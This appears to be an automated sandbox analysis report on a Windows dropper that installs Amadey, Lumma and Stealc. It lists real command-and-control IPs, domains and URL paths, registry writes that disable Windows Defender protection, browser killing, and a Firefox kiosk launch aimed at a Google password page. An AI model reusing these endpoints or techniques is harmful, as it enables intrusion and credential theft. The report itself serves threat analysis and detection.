Analysis
-
max time kernel
144s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
07-12-2024 02:44
Static task
static1
Behavioral task
behavioral1
Sample
553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe
Resource
win7-20240903-en
General
-
Target
553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe
-
Size
1.8MB
-
MD5
a93b02d857db3b12c32bd765b83825ab
-
SHA1
137f12047a081e6581e1d1a83c939d98514c3ff3
-
SHA256
553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa
-
SHA512
aab2bfd4090c77b87784d0110f5ee2dd24554fada9bdf9c2e8e08ff01a9025f5d8a7dfa2d4b89bf35cb037c162292a04f1084b87727b1bd201a9b5ab1b367bcd
-
SSDEEP
49152:3jRwzOUOxqpHXV7ehRYo/cpkFt80BZ2QV7aGyC:3j+pOkJXV7Nqckm
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://impend-differ.biz/api
https://print-vexer.biz/api
https://dare-curbys.biz/api
https://covery-mover.biz/api
https://formy-spill.biz/api
https://dwell-exclaim.biz/api
https://zinc-sneark.biz/api
https://se-blurry.biz/api
https://atten-supporse.biz/api
Extracted
stealc
drum
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://atten-supporse.biz/api
https://se-blurry.biz/api
https://zinc-sneark.biz/api
Signatures
-
Amadey family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 27c0ef76e8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 27c0ef76e8.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 27c0ef76e8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 27c0ef76e8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 27c0ef76e8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 27c0ef76e8.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d1eb0cd776.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 165fa3ed5f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 27c0ef76e8.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d1eb0cd776.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 165fa3ed5f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 165fa3ed5f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 27c0ef76e8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 27c0ef76e8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d1eb0cd776.exe -
Executes dropped EXE 5 IoCs
pid Process 2640 skotes.exe 852 d1eb0cd776.exe 2980 165fa3ed5f.exe 1744 a3af4d3bce.exe 3016 27c0ef76e8.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine 553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine d1eb0cd776.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine 165fa3ed5f.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine 27c0ef76e8.exe -
Loads dropped DLL 8 IoCs
pid Process 1660 553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe 1660 553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe 2640 skotes.exe 2640 skotes.exe 2640 skotes.exe 2640 skotes.exe 2640 skotes.exe 2640 skotes.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features 27c0ef76e8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 27c0ef76e8.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\d1eb0cd776.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012851001\\d1eb0cd776.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\165fa3ed5f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012852001\\165fa3ed5f.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\a3af4d3bce.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012853001\\a3af4d3bce.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\27c0ef76e8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012854001\\27c0ef76e8.exe" skotes.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0005000000019358-73.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 1660 553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe 2640 skotes.exe 852 d1eb0cd776.exe 2980 165fa3ed5f.exe 3016 27c0ef76e8.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 13 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 27c0ef76e8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d1eb0cd776.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language a3af4d3bce.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage a3af4d3bce.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 165fa3ed5f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a3af4d3bce.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Kills process with taskkill 5 IoCs
pid Process 2140 taskkill.exe 764 taskkill.exe 1484 taskkill.exe 2000 taskkill.exe 532 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_Classes\Local Settings firefox.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 1660 553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe 2640 skotes.exe 852 d1eb0cd776.exe 2980 165fa3ed5f.exe 1744 a3af4d3bce.exe 1744 a3af4d3bce.exe 3016 27c0ef76e8.exe 3016 27c0ef76e8.exe 3016 27c0ef76e8.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 2000 taskkill.exe Token: SeDebugPrivilege 532 taskkill.exe Token: SeDebugPrivilege 2140 taskkill.exe Token: SeDebugPrivilege 764 taskkill.exe Token: SeDebugPrivilege 1484 taskkill.exe Token: SeDebugPrivilege 2128 firefox.exe Token: SeDebugPrivilege 2128 firefox.exe Token: SeDebugPrivilege 3016 27c0ef76e8.exe -
Suspicious use of FindShellTrayWindow 15 IoCs
pid Process 1660 553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe 1744 a3af4d3bce.exe 1744 a3af4d3bce.exe 1744 a3af4d3bce.exe 1744 a3af4d3bce.exe 1744 a3af4d3bce.exe 1744 a3af4d3bce.exe 2128 firefox.exe 2128 firefox.exe 2128 firefox.exe 2128 firefox.exe 1744 a3af4d3bce.exe 1744 a3af4d3bce.exe 1744 a3af4d3bce.exe 1744 a3af4d3bce.exe -
Suspicious use of SendNotifyMessage 13 IoCs
pid Process 1744 a3af4d3bce.exe 1744 a3af4d3bce.exe 1744 a3af4d3bce.exe 1744 a3af4d3bce.exe 1744 a3af4d3bce.exe 1744 a3af4d3bce.exe 2128 firefox.exe 2128 firefox.exe 2128 firefox.exe 1744 a3af4d3bce.exe 1744 a3af4d3bce.exe 1744 a3af4d3bce.exe 1744 a3af4d3bce.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1660 wrote to memory of 2640 1660 553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe 29 PID 1660 wrote to memory of 2640 1660 553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe 29 PID 1660 wrote to memory of 2640 1660 553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe 29 PID 1660 wrote to memory of 2640 1660 553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe 29 PID 2640 wrote to memory of 852 2640 skotes.exe 31 PID 2640 wrote to memory of 852 2640 skotes.exe 31 PID 2640 wrote to memory of 852 2640 skotes.exe 31 PID 2640 wrote to memory of 852 2640 skotes.exe 31 PID 2640 wrote to memory of 2980 2640 skotes.exe 33 PID 2640 wrote to memory of 2980 2640 skotes.exe 33 PID 2640 wrote to memory of 2980 2640 skotes.exe 33 PID 2640 wrote to memory of 2980 2640 skotes.exe 33 PID 2640 wrote to memory of 1744 2640 skotes.exe 34 PID 2640 wrote to memory of 1744 2640 skotes.exe 34 PID 2640 wrote to memory of 1744 2640 skotes.exe 34 PID 2640 wrote to memory of 1744 2640 skotes.exe 34 PID 1744 wrote to memory of 2000 1744 a3af4d3bce.exe 35 PID 1744 wrote to memory of 2000 1744 a3af4d3bce.exe 35 PID 1744 wrote to memory of 2000 1744 a3af4d3bce.exe 35 PID 1744 wrote to memory of 2000 1744 a3af4d3bce.exe 35 PID 1744 wrote to memory of 532 1744 a3af4d3bce.exe 37 PID 1744 wrote to memory of 532 1744 a3af4d3bce.exe 37 PID 1744 wrote to memory of 532 1744 a3af4d3bce.exe 37 PID 1744 wrote to memory of 532 1744 a3af4d3bce.exe 37 PID 1744 wrote to memory of 2140 1744 a3af4d3bce.exe 39 PID 1744 wrote to memory of 2140 1744 a3af4d3bce.exe 39 PID 1744 wrote to memory of 2140 1744 a3af4d3bce.exe 39 PID 1744 wrote to memory of 2140 1744 a3af4d3bce.exe 39 PID 1744 wrote to memory of 764 1744 a3af4d3bce.exe 41 PID 1744 wrote to memory of 764 1744 a3af4d3bce.exe 41 PID 1744 wrote to memory of 764 1744 a3af4d3bce.exe 41 PID 1744 wrote to memory of 764 1744 a3af4d3bce.exe 41 PID 1744 wrote to memory of 1484 1744 a3af4d3bce.exe 43 PID 1744 wrote to memory of 1484 1744 a3af4d3bce.exe 43 PID 1744 wrote to memory of 1484 1744 a3af4d3bce.exe 43 PID 1744 wrote to memory of 1484 1744 a3af4d3bce.exe 43 PID 1744 wrote to memory of 2100 1744 a3af4d3bce.exe 45 PID 1744 wrote to memory of 2100 1744 a3af4d3bce.exe 45 PID 1744 wrote to memory of 2100 1744 a3af4d3bce.exe 45 PID 1744 wrote to memory of 2100 1744 a3af4d3bce.exe 45 PID 2100 wrote to memory of 2128 2100 firefox.exe 46 PID 2100 wrote to memory of 2128 2100 firefox.exe 46 PID 2100 wrote to memory of 2128 2100 firefox.exe 46 PID 2100 wrote to memory of 2128 2100 firefox.exe 46 PID 2100 wrote to memory of 2128 2100 firefox.exe 46 PID 2100 wrote to memory of 2128 2100 firefox.exe 46 PID 2100 wrote to memory of 2128 2100 firefox.exe 46 PID 2100 wrote to memory of 2128 2100 firefox.exe 46 PID 2100 wrote to memory of 2128 2100 firefox.exe 46 PID 2100 wrote to memory of 2128 2100 firefox.exe 46 PID 2100 wrote to memory of 2128 2100 firefox.exe 46 PID 2100 wrote to memory of 2128 2100 firefox.exe 46 PID 2128 wrote to memory of 2564 2128 firefox.exe 47 PID 2128 wrote to memory of 2564 2128 firefox.exe 47 PID 2128 wrote to memory of 2564 2128 firefox.exe 47 PID 2128 wrote to memory of 2440 2128 firefox.exe 48 PID 2128 wrote to memory of 2440 2128 firefox.exe 48 PID 2128 wrote to memory of 2440 2128 firefox.exe 48 PID 2128 wrote to memory of 2440 2128 firefox.exe 48 PID 2128 wrote to memory of 2440 2128 firefox.exe 48 PID 2128 wrote to memory of 2440 2128 firefox.exe 48 PID 2128 wrote to memory of 2440 2128 firefox.exe 48 PID 2128 wrote to memory of 2440 2128 firefox.exe 48 PID 2128 wrote to memory of 2440 2128 firefox.exe 48 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe"C:\Users\Admin\AppData\Local\Temp\553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Users\Admin\AppData\Local\Temp\1012851001\d1eb0cd776.exe"C:\Users\Admin\AppData\Local\Temp\1012851001\d1eb0cd776.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:852
-
-
C:\Users\Admin\AppData\Local\Temp\1012852001\165fa3ed5f.exe"C:\Users\Admin\AppData\Local\Temp\1012852001\165fa3ed5f.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2980
-
-
C:\Users\Admin\AppData\Local\Temp\1012853001\a3af4d3bce.exe"C:\Users\Admin\AppData\Local\Temp\1012853001\a3af4d3bce.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2000
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:532
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:764
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1484
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.0.1430177469\1492140918" -parentBuildID 20221007134813 -prefsHandle 1204 -prefMapHandle 1196 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {40084d1b-1917-43f4-9288-b39eae22dad7} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 1308 fed6158 gpu6⤵PID:2564
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.1.1813241620\1207456748" -parentBuildID 20221007134813 -prefsHandle 1484 -prefMapHandle 1480 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5acca9fb-cd7c-4d13-9e86-2a6e622e4aea} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 1496 edeb258 socket6⤵PID:2440
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.2.803376644\835238809" -childID 1 -isForBrowser -prefsHandle 2060 -prefMapHandle 2056 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {458d177d-038d-494e-887c-a9f6c44aba4a} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 2072 184c7058 tab6⤵PID:1036
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.3.530846057\1271207579" -childID 2 -isForBrowser -prefsHandle 2808 -prefMapHandle 2804 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd75f913-9ac5-4a1e-9cf1-402da143d74a} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 2820 1bf08558 tab6⤵PID:2300
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.4.265144092\861899394" -childID 3 -isForBrowser -prefsHandle 3632 -prefMapHandle 3652 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e8924fde-2a19-485e-8580-b0fbf2b4397f} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 3504 1eb46258 tab6⤵PID:1680
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.5.1000239758\466541562" -childID 4 -isForBrowser -prefsHandle 3800 -prefMapHandle 3804 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fe3deabe-3fa1-4efe-9119-4a14e5ea18fb} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 3788 1f3ed358 tab6⤵PID:2704
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.6.1653761712\1610857076" -childID 5 -isForBrowser -prefsHandle 3876 -prefMapHandle 3660 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f22db11-68f9-48b2-b7e8-b2cdd15c9d5e} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 3916 1f3ee858 tab6⤵PID:2576
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1012854001\27c0ef76e8.exe"C:\Users\Admin\AppData\Local\Temp\1012854001\27c0ef76e8.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3016
-
-
Network
-
Remote address:185.215.113.43:80RequestPOST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 07 Dec 2024 02:44:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address:185.215.113.43:80RequestPOST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 156
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 07 Dec 2024 02:44:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.43:80RequestPOST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 07 Dec 2024 02:44:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.43:80RequestPOST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 07 Dec 2024 02:45:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.43:80RequestPOST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 07 Dec 2024 02:45:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.43:80RequestPOST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 07 Dec 2024 02:45:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestGET /luma/random.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Sat, 07 Dec 2024 02:44:54 GMT
Content-Type: application/octet-stream
Content-Length: 1830400
Last-Modified: Sat, 07 Dec 2024 02:16:12 GMT
Connection: keep-alive
ETag: "6753afec-1bee00"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestGET /steam/random.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Sat, 07 Dec 2024 02:44:57 GMT
Content-Type: application/octet-stream
Content-Length: 5173248
Last-Modified: Sat, 07 Dec 2024 02:16:21 GMT
Connection: keep-alive
ETag: "6753aff5-4ef000"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestGET /well/random.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Sat, 07 Dec 2024 02:45:06 GMT
Content-Type: application/octet-stream
Content-Length: 971264
Last-Modified: Sat, 07 Dec 2024 02:14:24 GMT
Connection: keep-alive
ETag: "6753af80-ed200"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestGET /off/random.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Sat, 07 Dec 2024 02:45:10 GMT
Content-Type: application/octet-stream
Content-Length: 2766336
Last-Modified: Sat, 07 Dec 2024 02:14:50 GMT
Connection: keep-alive
ETag: "6753af9a-2a3600"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Requestatten-supporse.bizIN AResponseatten-supporse.bizIN A104.21.16.9atten-supporse.bizIN A172.67.165.166
-
Remote address:104.21.16.9:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: atten-supporse.biz
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
